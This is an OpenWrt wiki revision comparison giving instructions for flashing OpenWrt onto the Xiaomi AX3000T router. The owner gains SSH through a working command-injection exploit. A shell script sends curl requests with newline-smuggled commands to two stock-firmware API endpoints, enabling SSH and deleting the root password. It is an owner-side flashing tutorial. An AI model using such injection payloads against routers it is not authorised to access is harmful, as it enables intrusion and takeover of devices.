Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revision Previous revision
Next revisionBoth sides next revision
inbox:toh:xiaomi:ax3000t [2024/09/27 21:40] – Firmware support clarification for Winbond and ESMT alexqinbox:toh:xiaomi:ax3000t [2024/10/03 10:00] – refactoring Wiki instructions alexq
Line 24: Line 24:
 **Support Forums** https://forum.openwrt.org/t/openwrt-support-for-xiaomi-ax3000t/180490 **Support Forums** https://forum.openwrt.org/t/openwrt-support-for-xiaomi-ax3000t/180490
  
-There are known OpenWrt installation methods for the Xiaomi AX3000T: +There are known OpenWrt installation methods for the Xiaomi AX3000T: 
-  * **SSH exploit method**: the method involves executing cURL commands on the stock router firmware that allows enabling SSH access, thus making OpenWrt installation possible. This method is suitable for both **RD23** (International version) and **RD03** (Chinese version) of the Xiaomi AX3000T router. For details, please refer to the [[:inbox:toh:xiaomi:ax3000t#installation|Installation]] section below.  +  * **API RCE method**: the method involves executing shell commands on the stock router firmware to enable SSH access by exploiting the API RCEeither in ''xqsystem/start_binding'' or ''misystem/arn_switch'', depending on the firmware version. This method is suitable for both **RD23** (International version) and **RD03** (Chinese version) of the Xiaomi AX3000T router. For details, please refer to the [[:inbox:toh:xiaomi:ax3000t#installation|Installation]] section below. 
-    * note: //this method is not supported by stock firmware version 1.0.47 (CN).//+
   * **UART flash method**: the method which requires opening the device, connecting a UART cable, and following a specific set of steps. This process is recommended only for advanced users and may soft brick your device. The instructions for this process are available in this post: [[https://forum.openwrt.org/t/openwrt-support-for-xiaomi-ax3000t/180490/420?u=alexq|link to owrt forum]].   * **UART flash method**: the method which requires opening the device, connecting a UART cable, and following a specific set of steps. This process is recommended only for advanced users and may soft brick your device. The instructions for this process are available in this post: [[https://forum.openwrt.org/t/openwrt-support-for-xiaomi-ax3000t/180490/420?u=alexq|link to owrt forum]].
-  * **Firmware downgrade method** (legacy): the method requires installing a vulnerable version of the stock firmware, which allows to proceed with commands to enable SSH access in a way similar to the "SSH exploit method". This method is applicable only for **RD03** (Chinese version). For details, please refer to the [[:inbox:toh:xiaomi:ax3000t#downgrading_stock_firmware|Downgrading stock firmware]] section. 
  
-Stock firmware compatibility and OpenWrt installation methods+OpenWrt Support Status
-^ Stock Firmware ver.             ^Model OpenWrt Installation Method     ^ OpenWrt Supported     ^ Stock Firmware URL  ^ +^ Stock Firmware ver.             ^Model API to exploit     ^ OpenWrt Supported     ^ Stock Firmware URL  ^ 
-| 1.0.31 (INT)         | RD23 | SSH exploit                YES*             | -                                          | +| 1.0.31 (INT)         | RD23 | ''xqsystem/start_binding''                YES*             | -                                          | 
-| 1.0.49 (INT)         | RD23 | SSH exploit                YES*             | [[https://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/rd23/miwifi_rd23_firmware_153e1_1.0.49_INT.bin|miwifi_rd23_firmware_153e1_1.0.49_INT.bin]] | +| 1.0.49 (INT)         | RD23 | ''xqsystem/start_binding''                YES*             | [[https://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/rd23/miwifi_rd23_firmware_153e1_1.0.49_INT.bin|miwifi_rd23_firmware_153e1_1.0.49_INT.bin]] | 
-| 1.0.47 (CN)          | RD03 | Firmware downgrade       |   YES*             | [[https://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/rd03/miwifi_rd03_firmware_ef0ee_1.0.47.bin|miwifi_rd03_firmware_ef0ee_1.0.47.bin]] |  +| 1.0.47 (CN)          | RD03 | ''misystem/arn_switch''       |   YES*              | [[https://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/rd03/miwifi_rd03_firmware_ef0ee_1.0.47.bin|miwifi_rd03_firmware_ef0ee_1.0.47.bin]] |  
-| 1.0.64 (CN)          | RD03 | Any                        YES*             | [[https://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/rd03/miwifi_rd03_firmware_14680_1.0.64.bin|miwifi_rd03_firmware_14680_1.0.64.bin]]  |  +| 1.0.64 (CN)          | RD03 | ''xqsystem/start_binding''                        YES*             | [[https://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/rd03/miwifi_rd03_firmware_14680_1.0.64.bin|miwifi_rd03_firmware_14680_1.0.64.bin]]  |  
-| 1.0.84 (CN)          | RD03 |SSH exploit                **Not yet** (''AN8855'' hardware) | [[https://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/rd03/miwifi_rd03_firmware_f85f9_1.0.84.bin|miwifi_rd03_firmware_f85f9_1.0.84.bin]]| +| 1.0.84 (CN)          | RD03 | ''xqsystem/start_binding''                **Not yet** (''AN8855'' hardware) | [[https://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/rd03/miwifi_rd03_firmware_f85f9_1.0.84.bin|miwifi_rd03_firmware_f85f9_1.0.84.bin]]| 
  
   * *note: devices with the ''Winbond'' NAND chip are supported by [[:releases:snapshot|Snapshot]] version only.   * *note: devices with the ''Winbond'' NAND chip are supported by [[:releases:snapshot|Snapshot]] version only.
Line 67: Line 65:
  
 ==== Flash instructions ==== ==== Flash instructions ====
 +<WRAP center round info 60%>
 +Besides the manual steps outlined below, there is the [[https://github.com/openwrt-xiaomi/xmir-patcher|XMiR-Patcher]] tool that can automate the entire process, making the first-time router flashing much simpler with just a few clicks. As always, know what you're doing when executing scripts from the internet!
 +</WRAP>
  
 1. Get ssh access.  1. Get ssh access. 
- +  #!/bin/sh
-  #!/bin/bash+
      
-  if [ "$1" = "" ]; then +  if [ $# -ne 2 ]; then 
-    echo "Usage: $0 [stok]" +  cat <<EOF 
-    echo "e.g. $0 e6ea114ba2cddb0c70fbbc417bb2706c" +  Usage: $0 [misystem | xqsystem] [stok] 
-    echo "Copy the stok-string from a browser's URL-line, while being logged in to the router" +  e.g. $0 misystem e6ea114ba2cddb0c70fbbc417bb2706c 
-    exit 1+  Copy the stok-string from a browser's URL-line, while logged to the router 
 +  EOF 
 +  exit 1
   fi   fi
      
-  curl -X POST "http://192.168.31.1/cgi-bin/luci/;stok=${1}/api/xqsystem/start_binding" -d "uid=1234&key=1234'%0Anvram%20set%20ssh_en%3D1'"+  -z "$2" ] && echo "error: bad stok" && exit 1 
 +   
 +  url="http://192.168.31.1/cgi-bin/luci/;stok=${2}/api
 +   
 +  case "$1" in 
 +      misystem) 
 +          url="$url/misystem/arn_switch" 
 +          pre="open=1&model=1&level=" 
 +          suf="" 
 +          ;; 
 +      xqsystem) 
 +          url="$url/xqsystem/start_binding" 
 +          pre="uid=1234&key=1234'
 +          suf="'" 
 +          ;; 
 +      *) 
 +          echo "error: unknown api" && exit 1 
 +          ;; 
 +  esac 
 +   
 +  curl -X POST "$url" -d "${pre}%0Anvram%20set%20ssh_en%3D1%0A${suf}"
   sleep 1   sleep 1
-  curl -X POST "http://192.168.31.1/cgi-bin/luci/;stok=${1}/api/xqsystem/start_binding" -d "uid=1234&key=1234'%0Anvram%20commit'"+  curl -X POST "$url" -d "${pre}%0Anvram%20commit%0A${suf}"
   sleep 1   sleep 1
-  curl -X POST "http://192.168.31.1/cgi-bin/luci/;stok=${1}/api/xqsystem/start_binding" -d "uid=1234&key=1234'%0Ased%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%22debug%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear'"+  curl -X POST "$url" -d "${pre}%0Ased%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%22debug%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%0A${suf}"
   sleep 1   sleep 1
-  curl -X POST "http://192.168.31.1/cgi-bin/luci/;stok=${1}/api/xqsystem/start_binding" -d "uid=1234&key=1234'%0A%2Fetc%2Finit.d%2Fdropbear%20start'"+  curl -X POST "$url" -d "${pre}%0A%2Fetc%2Finit.d%2Fdropbear%20start%0A${suf}"
   sleep 1   sleep 1
-  curl -X POST "http://192.168.31.1/cgi-bin/luci/;stok=${1}/api/xqsystem/start_binding" -d "uid=1234&key=1234'%0Apasswd%20-d%20root%0A'"+  curl -X POST "$url" -d "${pre}%0Apasswd%20-d%20root%0A${suf}"
  
 2. Backup stock partitions 2. Backup stock partitions
Line 111: Line 133:
  
  
-3. Get firmware information `cat /proc/cmdline`+3. Get firmware information: ''cat /proc/cmdline''
  
 4. Copy openwrt-mediatek-filogic-xiaomi_mi-router-ax3000t-initramfs-factory.ubi to **/tmp** and flash 4. Copy openwrt-mediatek-filogic-xiaomi_mi-router-ax3000t-initramfs-factory.ubi to **/tmp** and flash
  
-If **firmware=0**+  * If **firmware=0** 
   ubiformat /dev/mtd9 -y -f /tmp/openwrt-mediatek-filogic-xiaomi_mi-router-ax3000t-initramfs-factory.ubi   ubiformat /dev/mtd9 -y -f /tmp/openwrt-mediatek-filogic-xiaomi_mi-router-ax3000t-initramfs-factory.ubi
   nvram set boot_wait=on   nvram set boot_wait=on
Line 127: Line 150:
   reboot   reboot
  
-If **firmware=1**+  * If **firmware=1** 
   ubiformat /dev/mtd8 -y -f /tmp/openwrt-mediatek-filogic-xiaomi_mi-router-ax3000t-initramfs-factory.ubi   ubiformat /dev/mtd8 -y -f /tmp/openwrt-mediatek-filogic-xiaomi_mi-router-ax3000t-initramfs-factory.ubi
   nvram set boot_wait=on   nvram set boot_wait=on
Line 139: Line 163:
   reboot   reboot
  
-Then reboot your router, it should boot to the OpenWrt initramfs system now. To be sure to use one of OpenWrt's LAN ports (not WAN port), plug the ethernet cable into one of the middle ports, if the cable is not already plugged there (original FW dynamically assigns LAN/WAN).+Once the router is rebooted, it should boot to the OpenWrt initramfs system now. To be sure to use one of OpenWrt's LAN ports (not WAN port), plug the ethernet cable into one of the middle ports, if the cable is not already plugged there (original FW dynamically assigns LAN/WAN).
  
 Note that you should configure the computer's network to use DHCP. You can use wireshark if things don't work. Note that you should configure the computer's network to use DHCP. You can use wireshark if things don't work.
Line 150: Line 174:
   sysupgrade -n /tmp/openwrt-mediatek-filogic-xiaomi_mi-router-ax3000t-squashfs-sysupgrade.bin   sysupgrade -n /tmp/openwrt-mediatek-filogic-xiaomi_mi-router-ax3000t-squashfs-sysupgrade.bin
  
-6. Run command to modify /etc/rc.local file with nvram settings:  
-  sed -i '/exit 0/i sleep 5\nfw_setenv flag_try_sys1_failed 0' /etc/rc.local 
  
 ==== Change to OpenWrt U-Boot ==== ==== Change to OpenWrt U-Boot ====
Line 166: Line 188:
   opkg update && opkg install kmod-mtd-rw   opkg update && opkg install kmod-mtd-rw
  
-  insmod /lib/modules/$(uname -r)/mtd-rw.ko i_want_a_brick=1+  insmod mtd-rw i_want_a_brick=1
  
 3. Format ubi and create new ubootenv volume 3. Format ubi and create new ubootenv volume
Line 196: Line 218:
   opkg update && opkg install kmod-mtd-rw   opkg update && opkg install kmod-mtd-rw
  
-  insmod /lib/modules/$(uname -r)/mtd-rw.ko i_want_a_brick=1+  insmod mtd-rw i_want_a_brick=1
  
 4. Flash stock images from backup 4. Flash stock images from backup
Line 205: Line 227:
 Then reboot your router, waiting it finished rollback in minutes. Then reboot your router, waiting it finished rollback in minutes.
  
-====  Go Back to stock from default layout Openwrt ==== +====  Go Back to stock firmware from stock bootloader ==== 
   ubiformat /dev/mtd8 -y -f /tmp/ubi.bin   ubiformat /dev/mtd8 -y -f /tmp/ubi.bin
  
Line 272: Line 294:
  
 ===== Downgrading stock firmware ===== ===== Downgrading stock firmware =====
-<WRAP center round important 60%> +This section is kept only for historical reference, as it relates to the deprecated OpenWrt installation method that was applicable only to the RD03 (Chinese version) with stock firmware version 1.0.47. Please note that none of the current installation methods require a firmware downgrade to flash OpenWrt.
-This is a legacy OpenWrt installation method and applicable only to the RD03 (Chinese version), and is required only for installing OpenWrt via the "Firmware downgrade method"+
-</WRAP> +
- +
-1. Install Vulnerable Version: +
- +
-First, you'll need to grab a vulnerable software version. The table below shows known vulnerable versions. It is recommended to install version 1.0.47. +
-^ Firmware Version      ^ Vulnerable?  ^ Download                                                                                       ^ +
-| 1.0.64                | NO          | https://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/rd03/miwifi_rd03_firmware_14680_1.0.64.bin +
-| 1.0.47 (recommended)  | YES          | https://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/rd03/miwifi_rd03_firmware_ef0ee_1.0.47.bin +
- +
-**To downgrade**: navigate to the upload firmware page and select the appropriate software version. It will complain about the downgrade. Edit the url and change the <html>0</html> at the end to a <html>1</html> and press enterOr change to <html>2</html> if there is already <html>1</html> (seen on v1.0.64). The downgrade will proceed. +
- +
-2. Get ssh access (supported only stock firmware **1.0.47**): +
- +
-  #!/bin/bash +
-   +
-  if [ "$1" = "" ]; then +
-    echo "Usage: $0 [stok]" +
-    echo "e.g. $0 e6ea114ba2cddb0c70fbbc417bb2706c" +
-    echo "Copy the stok-string from a browser's URL-line, while being logged in to the router" +
-    exit 1 +
-  fi +
-   +
-  curl -X POST "http://192.168.31.1/cgi-bin/luci/;stok=${1}/api/misystem/arn_switch" -d "open=1&model=1&level=%0Anvram%20set%20ssh_en%3D1%0A" +
-  sleep 1 +
-  curl -X POST "http://192.168.31.1/cgi-bin/luci/;stok=${1}/api/misystem/arn_switch" -d "open=1&model=1&level=%0Anvram%20commit%0A" +
-  sleep 1 +
-  curl -X POST "http://192.168.31.1/cgi-bin/luci/;stok=${1}/api/misystem/arn_switch" -d "open=1&model=1&level=%0Ased%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%22debug%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%0A" +
-  sleep 1 +
-  curl -X POST "http://192.168.31.1/cgi-bin/luci/;stok=${1}/api/misystem/arn_switch" -d "open=1&model=1&level=%0A%2Fetc%2Finit.d%2Fdropbear%20start%0A" +
-  sleep 1 +
-  curl -X POST "http://192.168.31.1/cgi-bin/luci/;stok=${1}/api/misystem/arn_switch" -d "open=1&model=1&level=%0Apasswd%20-d%20root%0A"+
  
-After thatproceed from step 2 in the main [[:inbox:toh:xiaomi:ax3000t#installation|Installation]] section.+**To downgrade** a firmware version on your routernavigate to the upload firmware page and select the appropriate software version. It will complain about the downgrade. Edit the url and change the <html>0</html> at the end to a <html>1</html> and press enter. Or change to <html>2</html> if there is already <html>1</html> (seen on v1.0.64). The downgrade will proceed.
  
 ===== Debricking ===== ===== Debricking =====
 -> [[docs:guide-user:troubleshooting:generic.debrick]] -> [[docs:guide-user:troubleshooting:generic.debrick]]
  
-Assume that you have installed OpenWrt with stock layout, with original u-boot:+Assume that you have installed OpenWrt with stock bootloader, with original u-boot:
  
   * Connect to router via UART   * Connect to router via UART
Line 330: Line 320:
 Details explained in [[https://forum.openwrt.org/t/openwrt-support-for-xiaomi-ax3000t/180490/860|this forum post]] Details explained in [[https://forum.openwrt.org/t/openwrt-support-for-xiaomi-ax3000t/180490/860|this forum post]]
  
-==== TFTP instructions for the stock layout ====+==== TFTP instructions for the stock bootloader ====
 AX3000T can be recovered from a soft-brick with TFTP. The flow is: AX3000T can be recovered from a soft-brick with TFTP. The flow is:
   * The router boots and asks for an IP address on the LAN ports via DHCP   * The router boots and asks for an IP address on the LAN ports via DHCP
Line 373: Line 363:
 -> [[docs:guide-user:base-system:start|Basic configuration]] After flashing, proceed with this.\\ -> [[docs:guide-user:base-system:start|Basic configuration]] After flashing, proceed with this.\\
 Set up your Internet connection, configure wireless, configure USB port, etc. Set up your Internet connection, configure wireless, configure USB port, etc.
 +
 +  * note: configuration reset issue after 6 reboots sometimes occurs on the AX3000T and is [[https://forum.openwrt.org/t/openwrt-support-for-xiaomi-ax3000t/180490/452?u=alexq|caused]] by the stock Xiaomi bootloader logic. To address this, run the command to modify the /etc/rc.local file with nvram settings:
 +
 +  sed -i '/exit 0/i sleep 5\nfw_setenv flag_try_sys1_failed 0' /etc/rc.local
 +
 +**Don't run** this command if the issue doesn't affect you, and your router keeps its settings after 6 reboots! 
  
 ===== Specific Configuration ===== ===== Specific Configuration =====
  • Last modified: 2024/12/19 08:57
  • by lessload